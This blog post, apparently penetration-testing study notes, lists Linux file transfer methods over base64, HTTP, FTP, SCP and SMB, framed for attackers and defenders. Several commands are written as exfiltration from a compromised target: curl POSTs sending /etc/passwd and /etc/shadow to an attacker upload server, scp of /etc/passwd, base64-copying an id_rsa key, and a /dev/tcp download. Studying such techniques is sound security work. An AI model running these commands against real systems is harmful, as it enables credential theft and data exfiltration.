Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Linux File Transfer Methods

Introduction

Linux provides many versatile tools for file transfers. Understanding these methods helps both attackers and defenders. Most malware uses HTTP/HTTPS for communication, though Linux also supports FTP, SMB, and other protocols.

Real-world example: Threat actors used a Bash script that attempted three download methods (cURL → wget → Python) to download malware via HTTP, demonstrating redundancy in file transfer methods.

Download Operations

Base64 Encoding / Decoding

For small files without network communication. Encode on source, copy string, decode on target. Verify with MD5 checksums.

On source machine:

md5sum id_rsa
cat id_rsa |base64 -w 0;echo

On target machine:

echo -n '<base64_string>' | base64 -d > id_rsa
md5sum id_rsa  # Verify hash matches

HTTP/HTTPS Downloads

Most common method. Multiple tools available with fallback options.

cURL:

curl http://<IP>/file.txt -o file.txt
curl https://<IP>/file.txt -k -o file.txt  # -k ignores SSL cert errors

wget:

wget http://<IP>/file.txt
wget --no-check-certificate https://<IP>/file.txt

Python:

python3 -c "import urllib.request; urllib.request.urlretrieve('http://<IP>/file.txt', 'file.txt')"

Bash (using /dev/tcp):

exec 3<>/dev/tcp/<IP>/80
echo -e "GET /file.txt HTTP/1.1\r\nHost: <IP>\r\nConnection: close\r\n\r\n" >&3
cat <&3 > file.txt

FTP Downloads

Interactive FTP:

ftp <IP>
# Then: get file.txt

Non-interactive FTP:

echo -e "open <IP>\nuser anonymous\nbinary\nget file.txt\nbye" | ftp -n

cURL FTP:

curl ftp://<IP>/file.txt -u anonymous: -o file.txt

SCP Downloads

Secure Copy Protocol over SSH (TCP/22). Requires SSH server on source.

Setup SSH server:

sudo systemctl enable ssh
sudo systemctl start ssh
netstat -lnpt  # Verify listening on port 22

Download from remote:

scp user@<IP>:/path/to/file.txt .
# With password prompt, or use SSH keys

Note: Create temporary user accounts for file transfers to avoid exposing primary credentials.

SMB Downloads

Install SMB client:

sudo apt install smbclient  # Debian/Ubuntu
sudo yum install samba-client  # RHEL/CentOS

Download file:

smbclient //<IP>/sharename -U username
# Then: get file.txt

Or non-interactive:

smbclient //<IP>/sharename -U username -c "get file.txt"

Upload Operations

Web Upload

Use Python’s uploadserver module for file uploads via HTTP/HTTPS.

Setup upload server (HTTP):

sudo python3 -m pip install --user uploadserver
python3 -m uploadserver 8000

Setup upload server (HTTPS):

# Create self-signed certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# Start HTTPS server
mkdir https && cd https
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

Upload from target:

# Single file
curl -X POST http://<IP>:8000/upload -F 'files=@/path/to/file'

# Multiple files
curl -X POST https://<IP>:443/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Alternative Web File Transfer

Start a simple web server on target machine, then download from attacker machine.

Python3 HTTP server:

python3 -m http.server 8000
# Access from attacker: wget http://<IP>:8000/file.txt

Python2.7 HTTP server:

python2.7 -m SimpleHTTPServer 8000

PHP HTTP server:

php -S 0.0.0.0:8000

Ruby HTTP server:

ruby -run -ehttpd . -p8000

Note: Inbound traffic may be blocked. This method transfers from target to attacker (download from attacker’s perspective).

SCP Upload

If SSH (TCP/22) outbound is allowed, upload files to SSH server.

Upload to remote:

scp /etc/passwd user@<IP>:/home/user/
# Syntax similar to cp: scp <source> <destination>

Upload directory:

scp -r /path/to/directory user@<IP>:/home/user/

FTP Uploads

Setup FTP server:

sudo python3 -m pyftpdlib --port 21 --write

Upload with cURL:

curl -T file.txt ftp://<IP>/ --user anonymous:

Upload with FTP client:

echo -e "open <IP>\nuser anonymous\nbinary\nput file.txt\nbye" | ftp -n

SMB Uploads

Upload file:

smbclient //<IP>/sharename -U username -c "put file.txt"

Mount and copy:

sudo mkdir /mnt/smb
sudo mount -t cifs //<IP>/sharename /mnt/smb -o username=user
cp file.txt /mnt/smb/
sudo umount /mnt/smb

Summary

  • Base64: No network needed, limited by terminal/paste buffer size
  • HTTP/HTTPS: Most common, multiple tools (curl, wget, Python), often allowed outbound
  • FTP: Alternative protocol, requires server setup
  • SCP/SSH: Secure, requires SSH server, TCP/22 may be blocked outbound
  • SMB: Common in enterprise, may require authentication
  • Web servers: Python/PHP/Ruby can quickly serve files for download
  • Upload servers: Python uploadserver module for receiving files

Redundancy strategy: Try multiple methods (curl → wget → Python) for reliability.